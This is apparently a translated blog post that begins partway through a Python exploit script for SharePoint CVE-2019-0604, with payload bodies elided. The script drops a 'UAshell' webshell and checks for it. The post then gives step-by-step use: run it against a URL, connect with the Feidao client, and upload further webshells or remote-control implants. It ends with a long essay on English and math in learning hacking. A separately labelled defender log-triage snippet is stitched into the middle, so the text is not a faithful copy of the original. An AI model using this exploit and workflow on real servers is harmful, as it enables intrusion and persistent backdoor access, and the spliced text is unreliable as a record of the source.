'__spPickerHasReturnValue':'',
'__spPickerReturnValueHolder':'',
'__VIEWSTATE':'<elided>',
'__VIEWSTATEGENERATOR':'A123E449',
ct1+paySection+'$ctl07$queryTextBox':'',
paySpanData:payload1+'<elided>'+payload2+'<elided>'+payload3+'<elided>',
ct1+paySection+ct2+'$OriginalEntities':'<Entities />',
ct1+paySection+ct2+'$HiddenEntityKey':'',
ct1+paySection+ct2+'$HiddenEntityDisplayText':'',
ct1+paySection+ct2+'$downlevelTextBox':' ',
'__CALLBACKID':ct1+paySection+'$ctl07',
'__CALLBACKPARAM':';#;#11;#;#;#',
'__EVENTVALIDATION':'/wEdAArGxMN0ZJ7K9w5zktdyYEhBD0ElpjQ1qya+g3gJn5tj2kGdpzwPwReE9qIrxAfsdm2iW+aWbiEcyxsYaScsTlQ450VsGNyXdI9EVzK0gDisZ5XfOLdqAfYHRFskSc14VkFc8gJL9PF80m6F3xAWwiF2sOBSyZzTvibJdZIQ6/yiluhmzA7nAUttaM/XaeAk14GgLvO2vw2Ax/oUZshBCs1rvRIjfjnjQxx1nrwDNJpAlG8icRe2xKLDvCGTmWjcu2A='}

data = urllib.urlencode(values)
req = urllib2.Request(url+spver, data)
response = urllib2.urlopen(req)
the_page = response.read()
print exp+'\n'+payload5
print the_page

headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Accept-Language": "en",
    "Cache-Control": "max-age=0",
    "Connection": "keep-alive",
    "Cookie": "PHPSESSID=m2hbrvp548cg6v4ssp0l35kcj7; _ga=GA1.2.2052701472.1532920469; _gid=GA1.2.1351314954.1532920469; __atuvc=3%7C31; __atuvs=5b5e9a0418f6420c001",   
    #"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36",
	"Upgrade-Insecure-Requests": "1",
	uapay: payload4,
	}

data = {"__CALLBACKID": "",
        "__VIEWSTATE": "",
        'ctl00$'+paySection+'$': "",
        "__CALLBACKID": "All",
        "__CALLBACKPARAM": ""}

response = requests.get(shellurl, headers=headers, timeout=5)
if response.content=='UAshell':
	print 'UAshell: '+shellurl
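A defender-side triage helper for the request pattern described above (a POST to Picker.aspx with PickerDialogType, the hiddenSpanData field beginning with "__", and the ua.aspx drop path this EXP checks). This is an added example, not code from the original post: the header layout (`__bp` plus four hex digits before the hex body) is an assumption drawn from the payload on this page, the gadget type names come from the public XmlSerializer gadget chain, and every log line and request body below is a constructed sample.

```python
"""Triage helpers for the CVE-2019-0604 request pattern (added example, not k8gege's code)."""
import re
from urllib.parse import parse_qs

PICKER_STEM = "/_layouts/15/Picker.aspx"
WEBSHELL_STEM = "/_layouts/15/ua.aspx"   # drop location the EXP on this page checks
SPAN_FIELD = "ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData"
# Type names from the public XmlSerializer gadget chain; any of them inside a decoded
# entity-instance id is a strong indicator (the page's payload carries ExpandedWrapper).
GADGET_MARKERS = ("ExpandedWrapper", "ObjectDataProvider", "XamlReader",
                  "System.Diagnostics.Process")


def decode_entity_instance_id(value):
    """Turn an encoded entity-instance id back into text, or return None.

    Shape observed in the page's payload: '__', then 'bp' plus four hex digits
    (assumed here to be a type/length header and skipped), then the UTF-16LE bytes
    of the string as hex with the nibbles of each byte swapped ('S' = 0x53 -> '35').
    """
    if not value.startswith("__") or len(value) < 8:
        return None
    body = value[8:]
    if len(body) % 4 or not re.fullmatch(r"[0-9a-fA-F]*", body):
        return None
    raw = bytes(int(body[i + 1] + body[i], 16) for i in range(0, len(body), 2))
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def inspect_picker_post(body):
    """Return the gadget markers found in the hiddenSpanData field of a captured POST body."""
    span = parse_qs(body, keep_blank_values=True).get(SPAN_FIELD, [""])[0]
    decoded = decode_entity_instance_id(span)
    return [] if decoded is None else [m for m in GADGET_MARKERS if m in decoded]


# Field order of the constructed W3C log excerpt below (IIS writes a '#Fields:' header).
W3C_FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
              "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]


def scan_iis_log(lines):
    """Flag Picker.aspx POSTs carrying PickerDialogType, and any hit on the ua.aspx path."""
    findings = []
    for line in lines:
        if line.startswith("#"):
            continue
        rec = dict(zip(W3C_FIELDS, line.split()))
        stem = rec.get("cs-uri-stem", "").lower()
        if (rec.get("cs-method") == "POST" and stem == PICKER_STEM.lower()
                and "pickerdialogtype=" in rec.get("cs-uri-query", "").lower()):
            findings.append((rec["c-ip"], "picker-dialog-type-post"))
        elif stem == WEBSHELL_STEM.lower():
            findings.append((rec["c-ip"], "ua.aspx-webshell-access"))
    return findings


# Constructed samples, not captured traffic. SAMPLE_SPAN is the opening of an encoded id
# whose body decodes to "System.Data.Services.Internal.ExpandedWrapper".
SAMPLE_SPAN = ("__bp82c1" "35009700370047005600d600e200" "4400160047001600e200"
               "35005600270067009600360056003700e200"
               "9400e600470056002700e6001600c600e200"
               "5400870007001600e6004600560046007500270016000700070056002700")
SAMPLE_BODY = "__VIEWSTATE=&" + SPAN_FIELD.replace("$", "%24") + "=" + SAMPLE_SPAN
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2019-06-18 16:41:35 10.0.0.5 POST /_layouts/15/Picker.aspx "
    "PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,Microsoft.SharePoint "
    "443 - 203.0.113.7 Python-urllib/2.7 200",
    "2019-06-18 16:41:36 10.0.0.5 GET /_layouts/15/ua.aspx - 443 - 203.0.113.7 Python-urllib/2.7 200",
    "2019-06-18 16:42:01 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\alice 192.0.2.10 Mozilla/5.0 200",
]

if __name__ == "__main__":
    print(decode_entity_instance_id(SAMPLE_SPAN))
    print(inspect_picker_post(SAMPLE_BODY))
    for client, reason in scan_iis_log(SAMPLE_LOG):
        print(client, reason)
```

IIS logs do not record POST bodies, so the decoder is meant for a body captured by a WAF or reverse proxy; the log scan alone already pairs the Picker.aspx POST with the later ua.aspx hit from the same client.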

 

In practice:

python cve-2019-0604-exp.py http://k8gege.github.io

If successful, the WebShell address is returned.

Visiting UAshell gives an error; don't panic, it was designed that way.

Connect with the K8 Feidao CMD; of course you can download other WebShells through CMD to manage the target,

for example Caidao, because apart from bypassing WAFs the Feidao UA-series WebShells have no file-management functions.

The UA one-liner is used instead of the Caidao one-liner because the Caidao one-liners all use POST and are easily blocked by WAFs.

Of course, once it is uploaded and you find the target has no WAF or antivirus, you can upload other WebShells or implant a remote-control tool.

 

Download:

 https://github.com/k8gege/CVE-2019-0604

 https://github.com/k8gege/K8tools/raw/master/cve-2019-0604-exp.py

Tips:

The college entrance examination has only just finished, so in the groups you will see some people saying that to learn information security you need good English and math to learn it well.

1. English

English goes without saying. The "joke" at the start of this article was first published by the University of Cambridge, which means that "joke" was originally in English.

What does that show? So-called grammar is not important, and Chinese is the same: once you have a certain awareness, you can understand it even when it is scrambled.

For example, everyone understands the basics of SQL injection. If an article tells you the injection-point URL and the SQL injection parameter,

whether the article is in English or Chinese, you know how to run it through sqlmap. But give it to someone with no foundation,

and even if it is written in Chinese in great detail, even if someone explains it to him in his own hometown dialect, he still won't understand.

When you read the "joke" at the start of the article, your brain automatically reorders it into a smooth sentence; the precondition is that you have some foundation.

Many people say new vulnerabilities and new APT attacks are all written in English and they can't understand them. What does that have to do with English???

Have Google Translate and Baidu Translate been eaten by you??? At worst the Chinese word order is a bit messy after translation.

You never went to primary school and can't even read Chinese characters??? The people who really can't understand are those who don't understand the techniques described in the so-called APT articles.

Currently, 80% of the techniques mentioned in 90% of APT articles are 10-year-old techniques; there is not much new technology.

What there is instead is piles of new terms, which sound very grand compared with before, but in fact the technology has not changed much.

 

2. Math

If math means exams, then in math the Chinese leave foreigners hundreds of streets behind;

I hear that foreigners have a big headache with math, and the math content at many foreign universities is actually Chinese middle-school math.

But the funniest thing is that many mathematical theorems were invented by foreigners. Doesn't that say something?

Why are foreigners so bad at exams, yet so strong in so many areas of science and technology?

 

3. Examples

First let me give an example. I had two high-school classmates; one was the only person in our year who got into Liugao (柳高), ranked first in the whole year overall.

The other was also very strong, top 10 in the year, but the main thing I want to say is that his English was excellent, and his physics and math were also good.

But on individual subjects they both had to consult me; for example, in physics and chemistry I was basically first in the whole year too, and genuinely so: as soon as I learned my score

I immediately knew where I had gone wrong and why, whereas others with high marks on the surface didn't necessarily know where they went wrong and only understood after the teacher explained.

And I was famous in the whole school for being lopsided: my English was not good (in middle school my English teacher said I would never get anywhere without learning English).

On the surface I scored a few dozen points in English and occasionally passed, but even that was only a surface pass; in reality my English was about the same as the last-placed student's.

For those two high-school classmates, I would rate their English and math as excellent; at university they studied computer software development.

At university they told me that after graduation they would develop systems for banks and the like, which sounded very impressive.

At the time they boasted that they were great at IT, that their hacking skills were amazing, and that their living expenses all came from stealing accounts.

I thought they really were that good, because at that time stealing accounts really was easy, and back then I wasn't very good at programming.

In my eyes anyone who could program was awesome, let alone them saying they could write any system, account-stealing software and so on.

About half a year later I met them back in my hometown; they seemed to know I really understood this stuff, and told me they had been bragging

and wanted to learn from me. I said if you are really interested, there are websites with my videos, but I never saw them go.

After graduation I heard the one who was first in the year is now doing sales, and the other is now a primary-school teacher.

Never mind my classmates; consider your own. Leaving aside how many top people in this field have nothing to do with an information-security degree,

first look at how many information-security graduates from the same class actually work in information security after graduation.

Some people's classmates include those whose English is very good, but they don't see them working in this field either.

 

4. In my view the most important things for learning IT well are interest and logical thinking

Solving math problems is the best way to train logical thinking; people who are good at math basically all have decent logical thinking.

But math is not the only training method; there is also deduction, playing chess, anything that requires thought.

Isn't penetration testing exactly a matter of trying all kinds of methods? Writing programs likewise means trying all kinds of functions.

Many programmers are rigid because their work is too monotonous; they write the same fixed modules or features over and over.

Of course, good logical thinking doesn't mean someone is strong at IT; he also has to be interested in learning it.

Note that I mean those who truly understand, not those who memorize by rote, can't generalize from one case to another, and merely score high in exams.

That is also the real reason why many people are great at exams but in practice can't beat foreigners.

 

So are people who are slow unsuited to this field? Of course not. Being less clever than others doesn't matter; you just need to spend more time learning.

At most you start a bit slower; many things you will naturally come to understand. It is the same few tricks over and over; there is nothing that can't be learned.

But if you are weak and still use poor English or math as an excuse, then I think you truly are unsuited.

If you stay in this field, your level will remain forever stuck at waiting for others to publish articles, tools or even tutorials.

 

Take the EXP in this article: you say your English is bad, fine, you don't need to read the original; many people in China with good English have translated it.

There is a Chinese article available directly; can't you understand Chinese? Besides, CVE-2019-0604 has been out for so long; how many of the people around you with good English

have produced an EXP? Many people can read the Chinese version, so why has nobody released an EXP tool either?

What is the real reason? It is not whether you can read a given country's language; the root cause is your current technical level.

Good English at most means reading English as fluently as Chinese; reading it translated into Chinese is just as fast (the brain reorders it automatically).

You can understand text even when its order is scrambled, and most translations are not that bad anyway; being weak really has nothing to do with English.

Writing code needs it even less; many development tools have hints, and typing the first letter shows many options,

as long as you know roughly what it looks like. Failing that, search Baidu or Google. Even the Microsoft engineers who developed the tools

have to consult the relevant documentation when writing code; scientists doing research likewise need to look up all kinds of material.

Many experts also say that reading books only gets you in the door and Google is where you improve (TK often says this on Weibo and Zhihu).

You're just an IT person; is looking things up on Baidu or Google embarrassing for you? Weak and lazy, and still fond of finding all kinds of excuses.

The scariest thing in this world is not that someone is smarter than you. It is that those who are smarter than you also work harder than you.


Origin: www.cnblogs.com/k8gege/p/11093992.html